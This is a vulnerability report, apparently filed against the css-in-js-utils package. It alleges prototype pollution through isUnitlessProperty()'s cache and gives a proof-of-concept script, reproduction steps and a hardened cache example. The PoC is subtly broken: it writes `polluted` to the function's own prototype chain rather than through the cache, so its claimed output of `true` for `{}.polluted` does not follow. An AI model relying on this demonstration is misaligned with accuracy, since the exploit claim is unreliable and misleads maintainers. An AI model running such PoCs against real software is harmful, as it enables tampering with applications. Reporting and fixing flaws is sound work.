Hi, we are a security team. We found a Prototype Pollution vulnerability in your project.
Vulnerability Cause
The isUnitlessProperty() function uses a plain object as a cache. When `__proto__` is passed as the property name, the cache lookup and write go through the object's prototype chain instead of an own property, which the report describes as polluting the cache object's prototype and leading to global pollution.
Vulnerable Code Location
css-in-js-utils/lib/isUnitlessProperty.js
```js
// Excerpt of the cache lookup inside isUnitlessProperty()
if (cache[property]) {
  return cache[property];
}
cache[property] = isUnitless; // No filtering of prototype keys such as __proto__
```
Proof of Concept (POC)
```js
const { isUnitlessProperty } = require('css-in-js-utils');
// Trigger pollution
isUnitlessProperty('__proto__');
// Write polluted value
isUnitlessProperty.__proto__.polluted = true;
// Verify pollution
console.log({}.polluted); // Output: true
```
Reproduction Steps
Install: npm i css-in-js-utils
Save the POC above as poc.js and run it: node poc.js
If the output is true, the pollution is successful
Impact
Commonly used in CSS-in-JS libraries; pollution may cause style rendering errors or application instability.
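For maintainers, the following is an added example (not code from css-in-js-utils) of a cache that cannot be reached through prototype keys: the cache is created with `Object.create(null)` and consulted with an own-property check, so `__proto__` is just an ordinary key. The `unitlessProperties` set and the `isUnitlessPropertySafe` name are assumptions standing in for the library's real logic.

```javascript
// Added example, not the css-in-js-utils source. Demonstrates why a plain
// object is a poor cache for untrusted keys and how to harden it.

// Constructed subset of unitless CSS properties (stand-in for the real list).
const unitlessProperties = new Set(['lineHeight', 'zIndex', 'opacity', 'flex']);

// With a plain {} cache, reading an inherited key such as "__proto__"
// returns Object.prototype, a truthy value, so the lookup is never a clean miss.
function lookupOnPlainCache(property) {
  const plainCache = {};
  return plainCache[property];
}

// Object.create(null) has no prototype chain: "__proto__" is a plain own key,
// and a write to it never touches Object.prototype.
const cache = Object.create(null);

function isUnitlessPropertySafe(property) {
  // Own-property check instead of a truthiness check; this also caches
  // `false` results correctly instead of recomputing them every call.
  if (Object.prototype.hasOwnProperty.call(cache, property)) {
    return cache[property];
  }
  const isUnitless = unitlessProperties.has(property);
  cache[property] = isUnitless;
  return isUnitless;
}

// Regression check a test suite can keep: probe the cache with prototype-ish
// keys, then confirm Object.prototype is still untouched.
function prototypeIsClean() {
  for (const key of ['__proto__', 'constructor', 'prototype']) {
    isUnitlessPropertySafe(key);
  }
  const probe = {};
  return Object.getPrototypeOf(cache) === null
    && !('polluted' in probe)
    && Object.keys(Object.prototype).length === 0;
}
```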